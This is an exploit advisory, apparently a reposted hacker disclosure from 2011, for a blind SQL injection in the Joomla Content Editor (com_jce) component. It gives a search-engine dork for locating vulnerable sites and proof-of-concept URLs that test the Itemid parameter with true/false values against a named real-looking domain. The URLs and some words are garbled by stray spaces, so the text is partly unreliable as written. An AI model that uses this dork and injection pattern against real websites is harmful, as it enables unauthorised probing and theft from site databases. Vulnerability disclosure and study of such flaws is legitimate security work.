========================================================== ======================================
Joomlacontenteditor (com_jce) BLIND SQL injection vulnerability
========================================================== ======================================
Software: joomlacontenteditor (com_jce)
Vendor: www.joomlacontenteditor.net
Vuln Type: BLind SQL Injection
Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com
Home: www.eidelweiss.info
Dork: inurl: "/index. php? Option = com_jce"
References: html "> http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html
========================================================== ======================================
Description:
JCE makes creating and editing Joomla!®
Content easy Add a set of tools to your Joomla!®Environment that give you the power to create the kind of content you want,
Without limitations, and without needing to know or learn HTML, XHTML, CSS...
========================================================== ======================================
Exploit & p0c
[!] Index. php? Option = com_jce & Itemid = [valid Itemid]
Example p0c
[!] Http://www.bkjia.com/index.php? Option = com_jce & Itemid = 8 <= True
[!] Http://www.bkjia.com/index.php? Option = com_jce & Itemid =-8 <= False
========================================================== ======================================
Nothing Impossible In This World Even Nobody's Perfect
========================================================== ======================================
=======================================|-= [E0F] =-| ====== ==================================